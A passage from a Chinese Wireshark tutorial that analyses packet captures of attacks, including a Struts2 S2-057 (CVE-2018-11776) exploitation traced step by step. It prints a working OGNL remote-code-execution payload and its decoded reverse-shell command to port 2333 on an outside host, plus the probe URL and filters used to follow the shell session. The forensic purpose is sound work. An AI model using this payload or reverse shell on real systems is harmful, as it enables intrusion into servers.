忘川彼岸|wireshark使用及实列分析( 三 )
依次往后面查看 , 发现攻击者执行了 , whoami,ipconfig /all , net user /domain , dir等命令 。 并且受害者返回执行结果
鼠标右键点击--->选择as printable text , 将数据包提取出来 , 复制到sublime中可以更清晰的查看
3.3 Struts2 S2-057 Remote Code Execution Vulnerablity(CVE-2018-11776)
struts s2-057主要通过GET请求发起攻击 , 只查看GET请求的数据
http.request.method=="GET"
3.3.1 poc验证漏洞
攻击者先采用poc:
/$%7B(111+111)%7D/actionChain1.action
探测是否存在struts s2-057漏洞 , 跟踪http流查看漏洞是否存在
表达式执行成功 , 说明该漏洞存在 , 接下来查看攻击者利用该漏洞做了什么
3.3.2 查看攻击者利用漏洞做了什么
查看最后一个http流 , 发现存在bash字样 , 跟踪http流查看
payload url解码:
/struts2-showcase/${(# dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(# ct=# request['struts.valueStack'].context).(# cr=# ct['com.opensymphony.xwork2.ActionContext.container']).(# ou=# cr.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(# ou.getExcludedPackageNames.clear).(# ou.getExcludedClasses.clear).(# ct.setMemberAccess(# dm)).(# a=@java.lang.Runtime@getRuntime.exec('bash -c {echo,YmFzaCAtaSA+Ji9kZXYvdGNwLzEwNi4xNC4xOTAuOTMvMjMzMyAwPiYxCg==}|{base64,-d}|{bash,-i}')).(@org.apache.commons.io.IOUtils@toString(# a.getInputStream))}/actionChain1.action
发现攻击者在尝试反弹shell
paylaod中的base64字符串解码得到:
bash -i >&/dev/tcp/106.190.x.x/2333 0>&1
说明攻击者想将shell反弹到106.190.x.x的2333端口
3.3.3 查看攻击者是否拿到shell , 并执行了那些操作
已经确定反弹shell的vps , 那么直接查看与该ip的数据流
ip.addr==106.190.x.x
发现数据中存在服务器名 , 跟踪tcp流 , 发现攻击者执行了ls命令 , 并且执行成功 。
No.4 参考链接
【忘川彼岸|wireshark使用及实列分析】
推荐阅读
![[健康零距离]通心络胶囊的功效及作用不能只看名字](http://ttbs.guangsuss.com/image/b523d59e4693de989fb7920e1e464b1a)
- 时光的彼岸|被公司派外省出差几个月,换了个发型挡住圆脸,幽默笑话:姐姐胖
- 忘川秋水|这款北美最畅销的SUV在国内是这样,全新讴歌MDX正式亮相
- 时光的彼岸|发现不跳了,搞笑段子:摸了一下脉搏
- 卜娃娃HLS实战之Wireshark抓包分析
- 转管炮|联合国投票结束,中俄获重要职位,美:真糟糕,大洋彼岸传出捷报
- 时光的彼岸|开心一笑:我是送快递的。
- 知识百科|考研人的一天, 乘风破浪, 终抵彼岸!
- IPFS彼岸云社区 Filecoin主网上线后FIL币价格会爆涨吗?
- 彼岸天使 天芪扶贫攻坚战打响了胜利的第一枪,撸起袖子吹起号角
- 3DM游戏网|《彼岸之书》第二章视频通关攻略介绍